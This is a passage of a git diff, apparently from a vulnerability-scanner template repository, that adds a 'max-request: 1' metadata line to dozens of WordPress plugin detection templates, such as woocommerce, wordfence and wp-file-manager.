     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
